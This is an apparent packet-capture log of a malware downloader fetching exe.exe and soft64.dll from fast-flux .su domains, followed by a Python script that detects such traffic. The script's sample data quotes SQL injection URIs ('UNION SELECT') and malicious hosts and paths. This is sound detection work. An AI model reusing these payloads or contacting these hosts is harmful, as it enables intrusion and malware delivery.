2014-08-15 09:11:05.695797 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [F.], seq 294, ack 149, win 64092, length 0
E..(..@….?…..wi..t.P……!&P..\……….
2014-08-15 09:11:05.695816 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 295, win 64239, length 0
E..(Y……..wi……P.t..!&….P………….
2014-08-15 09:11:05.699398 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..?……AV………..5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:05.712765 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [FP.], seq 149, ack 295, win 64239, length 0
E..(Y……..wi……P.t..!&….P….{……..
2014-08-15 09:11:05.712972 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [.], ack 150, win 64092, length 0
E..(..@….=…..wi..t.P……!’P..\……….
2014-08-15 09:11:06.045599 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 274730080:274731447, ack 3301971623, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…\……#.&…….P.s.`.`….P…….HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 14:11:04 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 90112
Connection: close
Content-Type: text/html

[first 1367 bytes of the 90112-byte text/html body: non-printable data, omitted]
2014-08-15 09:11:06.046425 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [.], seq 1367:2827, ack 1, win 64240, length 1460: HTTP
[non-printable data, omitted]
2014-08-15 09:11:06.046448 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 2827:4101, ack 1, win 64240, length 1274: HTTP
[non-printable data, omitted]

2014-08-15 09:11:06.714346 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..?……A…………5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:07.727996 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..? …..A ………..5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:07.729685 IP 172.16.204.2.53 > 172.16.204.128.51462: 23471 13/0/0 A 178.74.212.207, A 213.111.146.59, A 46.119.141.38, A 76.71.165.162, A 178.74.226.67, A 188.190.5.162, A 109.104.165.244, A 46.98.129.84, A 91.203.89.26, A 134.249.11.2, A 93.78.67.85, A 46.211.40.28, A 66.231.16.101 (243)
E…k……6………5……[…………dients-lihuret.su………………J……………o.;………….w.&…………LG……………J.C……………………….mh……………b.T…………[.Y………………………..]NCU…………..(………….B..e
2014-08-15 09:11:07.730376 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [S], seq 3923929809, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4 .@……….J…v.P..j……. .9……………
2014-08-15 09:11:07.920077 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [S.], seq 493119538, ack 3923929810, win 64240, options [mss 1460], length 0
E..,l……j.J…….P.v.dh2..j.`….h……..
2014-08-15 09:11:07.920132 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [.], ack 1, win 64240, length 0
E..( .@….!…..J…v.P..j..dh3P….%……..
2014-08-15 09:11:07.930887 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
E..d .@……….J…v.P..j..dh3P…._..GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:07.930896 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [.], ack 317, win 64240, length 0
E..(l……m.J…….P.v.dh3..l.P………….
2014-08-15 09:11:08.139123 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…nj…..c.J…….P.v.dh3..l.P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:37 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……..Kf..*…*…*.. %U..*…5…*..`6…*…5…*…5…*…….*…….*…* .X….5…*..$,…*..Rich.*……………………..PE..L…%..S……………..`…@…….h…….p….@………………………………………………………………..~……….X………………………………………………………………….p………………………….texu….X…….Y……………… ..a.rdata…….p…….p…………..@..A.data….D…….I………………@….rsrc…Y………………………@..D………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

2014-08-15 09:11:12.974845 IP 172.16.204.128.49272 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
E..d S@……….J…x.PW’..%TS.P…AR..GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:12.974899 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [.], ack 317, win 64240, length 0
E..(…….t.J…….P.x%TS.W’..P…:………
2014-08-15 09:11:13.209681 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E….c…..j.J…….P.x%TS.W’..P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:42 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-08-15 09:14:03.628461 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
E..?.M….I……….V.5.+F+@…………dients-lihuret.su…..
2014-08-15 09:14:04.624698 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
E..?.R….I……….V.5.+F+@…………dients-lihuret.su…..
2014-08-15 09:14:05.327272 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 37.229.189.208, A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81 (259)
E…E……`………5.V….@…………dients-lihuret.su……………..%…………….ix………………………..^..V………….L…………..].B………………………..N8\………….]O.I………….o.2…………_.tr…………]O.p…………mW;……………^Q
2014-08-15 09:14:05.329188 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [S], seq 357766832, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.S@….*….%……P.S…….. ..q…………..
2014-08-15 09:14:05.442685 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81, A 37.229.189.208 (259)
E…F…………….5.V….@…………dients-lihuret.su………………ix………………………..^..V………….L…………..].B………………………..N8\………….]O.I………….o.2…………_.tr…………]O.p…………mW;……………^Q…………%…
2014-08-15 09:14:05.664770 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [S.], seq 875893152, ack 357766833, win 64240, options [mss 1460], length 0
E..,HW……%……..P..45…S..`………….
2014-08-15 09:14:05.664958 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [.], ack 1, win 64240, length 0
E..(.U@….4….%……P.S..45..P…&m……..
2014-08-15 09:14:05.665104 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [P.], seq 1:222, ack 1, win 64240, length 221: HTTP: GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
E….V@….V….%……P.S..45..P….
..GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:14:05.665109 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [.], ack 222, win 64240, length 0
E..(HX…..1%……..P..45…S..P…%………
2014-08-15 09:14:05.920418 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…J……’%……..P..45…S..P….s..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: “53edc9e4-2ac04″
Accept-Ranges: bytes

[first 1338 bytes of the 175108-byte soft64.dll body: non-printable data, omitted. Unlike exe.exe above, the body does not begin with an MZ header.]
2014-08-15 09:14:06.020081 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…J……M%……..P..45…S..P….s..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: “53edc9e4-2ac04”
Accept-Ranges: bytes

2014-08-15 09:14:13.292765 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
E..;……I9………..5.’.x…………
triple-bow.su…..
2014-08-15 09:14:14.298401 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
E..;……I7………..5.’.x…………
triple-bow.su…..
2014-08-15 09:14:14.915431 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 134.249.11.2, A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69 (223)
E……….e………5………………
triple-bow.su…………………………….e……………o.2……………8………….. ?………….uN………….U..%…………C…………….J…………..w.JB……………………….%s.E
2014-08-15 09:14:14.921205 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [S], seq 1365434509, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….[………..PQb…….. .R<…………..
2014-08-15 09:14:14.923071 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [S], seq 44314422, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….Z………..P../6…… .RQ…………..
2014-08-15 09:14:15.114950 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [S.], seq 2115704189, ack 1365434510, win 64240, options [mss 1460], length 0
E..,……………..P..~..}Qb..`………….
2014-08-15 09:14:15.115089 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
E..(..@….b………..PQb..~..~P…$u……..
2014-08-15 09:14:15.115380 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [P.], seq 1:335, ack 1, win 64240, length 334: HTTP: GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
E..v..@…………….PQb..~..~P…….GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: triple-bow.su
Connection: Keep-Alive
2014-08-15 09:14:15.115439 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [.], ack 335, win 64240, length 0
E..(……………..P..~..~Qb..P…#’……..
2014-08-15 09:14:15.131947 IP 134.249.11.2.80 > 172.16.204.128.49160: Flags [S.], seq 934879185, ack 44314423, win 64240, options [mss 1460], length 0
E..,……………..P..7…../7`…H………
2014-08-15 09:14:15.132078 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
E..(..@….`………..P../77…P…`………
2014-08-15 09:14:15.239847 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69, A 134.249.11.2 (223)
E….w……………5………………
triple-bow.su………………e……………o.2……………8………….. ?………….uN………….U..%…………C…………….J…………..w.JB……………………….%s.E…………….
2014-08-15 09:14:15.462714 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [FP.], seq 1:179, ack 335, win 64240, length 178: HTTP: HTTP/1.1 200 OK
E………………..P..~..~Qb..P…R…HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:14:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 29
Connection: close

<html><body>hi!</body></html>

2014-08-15 09:15:27.993338 IP 172.16.204.128.49169 > 195.114.145.69.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
E…..@…*……r.E…P~.q6K$[.P….n..GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: triple-bow.su
Cache-Control: no-cache
2014-08-15 09:15:27.993353 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [.], ack 218, win 64240, length 0
E..(……n..r.E…..P..K$[.~.r.P………….
2014-08-15 09:15:28.270522 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [P.], seq 1:1236, ack 218, win 64240, length 1235: HTTP: HTTP/1.1 200 OK
E….0….g..r.E…..P..K$[.~.r.P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:28 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: close

2014-08-15 09:15:29.210604 IP 172.16.204.128.49171 > 31.192.209.57.8080: Flags [P.], seq 1:223, ack 1, win 64240, length 222: HTTP: GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
E….
@….]…….9….3;7g{.g.P…l…GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: 31.192.209.57:8080
Cache-Control: no-cache
2014-08-15 09:15:29.210638 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [.], ack 223, win 64240, length 0
E..(…….k…9……..{.g.3;8EP….M……..
2014-08-15 09:15:29.521750 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [P.], seq 1:1242, ack 223, win 64240, length 1241: HTTP: HTTP/1.1 200 OK
E….f………9……..{.g.3;8EP…….HTTP/1.1 200 OK
Server: nginx/1.2.2
Date: Fri, 15 Aug 2014 14:19:07 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: close

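The captures in the posts above (the two SQL injection samples and the Zemot/Kuluoz download) share the tcpdump text format, so one small parser can carry detection rules for all of them. This is an added example, not code from the original posts. It splits tcpdump -A text into packets and applies four rules: SQL keywords inside a request URI (`catid=0+and+1=0`, `id=1%27+UNION+SELECT`), database error text in a response body (the ODBC error Active Business Directory returned), a PE file (`MZ`) served with a text/ Content-Type (the Zemot downloader's text/plain exe.exe), and a DNS answer carrying an unusually large set of A records for one name (the 13-address reply for dients-lihuret.su). `SAMPLE` is constructed from condensed lines of the captures above, and the flux threshold of 8 is an arbitrary choice for the demo.

```python
import re
from collections import namedtuple

# Packet header line as printed by tcpdump, with or without the PPPoE prefix seen in the 2009 captures.
HDR = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) (?:PPPoE \[[^\]]*\] )?IP '
    r'(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$')
REQ = re.compile(r'(GET|POST) (\S+) HTTP/1\.[01]')
# Injection marker in a URI: optional quote, a separator, a SQL keyword, another separator.
SQLI = re.compile(r"(?i)(?:%27|')?(?:\+|%20|\s)(?:and|or|union|select)(?:\+|%20|\s)")
DB_ERROR = re.compile(r'OLE DB Provider|ODBC|Syntax error|SQL syntax|mysql_')
DNS_ANSWER = re.compile(r'^\d+ \d+/\d+/\d+ ')          # "23471 13/0/0 A 178.74.212.207, A ..."
A_RECORD = re.compile(r'\bA ([\d.]+)')
CONTENT_TYPE = re.compile(r'(?im)^content-type:\s*([^\s;]+)')

Packet = namedtuple('Packet', 'ts src sport dst dport summary payload')


def parse(text):
    """Split tcpdump -A text into packets: each header line plus the payload lines that follow it."""
    packets = []
    for line in text.splitlines():
        m = HDR.match(line)
        if m:
            packets.append(Packet(m['ts'], m['src'], int(m['sport']), m['dst'], int(m['dport']), m['rest'], []))
        elif packets:
            packets[-1].payload.append(line)
    return packets


def triage(text, flux_threshold=8):
    """Return (rule, src, dst, detail) for every packet that trips one of the four rules."""
    findings = []
    for p in parse(text):
        req = REQ.search(p.summary)
        if req and SQLI.search(req.group(2)):
            findings.append(('sqli-request', p.src, p.dst, req.group(2)))
        if 'HTTP: HTTP/1.' in p.summary:                       # a response: headers, blank line, body
            head, _, body = '\n'.join(p.payload).partition('\n\n')
            ctype = CONTENT_TYPE.search(head)
            ctype = ctype.group(1).lower() if ctype else ''
            if DB_ERROR.search(body):                          # database error text leaking to the client
                findings.append(('db-error-leak', p.src, p.dst, body.strip().splitlines()[0]))
            if ctype.startswith('text/') and any(l.startswith('MZ') for l in body.splitlines()):
                findings.append(('exe-as-text', p.src, p.dst, ctype))   # PE file declared as text
        if p.sport == 53 and DNS_ANSWER.match(p.summary):
            ips = set(A_RECORD.findall(p.summary))
            if len(ips) >= flux_threshold:                     # one name resolving to many unrelated hosts
                findings.append(('fast-flux-candidate', p.src, p.dst, '%d A records' % len(ips)))
    return findings


# Constructed sample: condensed lines taken from the captures above.
SAMPLE = """\
2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1:1421, ack 438, win 65098, length 1420: HTTP: HTTP/1.1 500 Internal Server Error
Content-Type: text/html

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3/* HTTP/1.1
Host: www.musicza.com
2014-08-15 09:11:07.729685 IP 172.16.204.2.53 > 172.16.204.128.51462: 23471 13/0/0 A 178.74.212.207, A 213.111.146.59, A 46.119.141.38, A 76.71.165.162, A 178.74.226.67, A 188.190.5.162, A 109.104.165.244, A 46.98.129.84, A 91.203.89.26, A 134.249.11.2, A 93.78.67.85, A 46.211.40.28, A 66.231.16.101 (243)
2014-08-15 09:11:08.139123 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
Content-Type: text/plain
Content-disposition: attachment; filename=exe.exe

1f68
MZ......This program cannot be run in DOS mode..
2014-08-15 09:14:15.115380 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [P.], seq 1:335, ack 1, win 64240, length 334: HTTP: GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
Host: triple-bow.su
"""

if __name__ == '__main__':
    for rule, src, dst, detail in triage(SAMPLE):
        print('%-20s %s -> %s  %s' % (rule, src, dst, detail))
```

Run the script over `tcpdump -A -r file.pcap` output to reproduce the findings on the real captures. The SQLi rule is deliberately narrow (it wants a separator on both sides of the keyword) so that paths such as `/b/eve/...` and ordinary words in URIs do not trip it; the content-type mismatch rule is the one that catches a downloader even when the URL and host are brand new, because a PE file labelled text/plain is wrong regardless of who serves it.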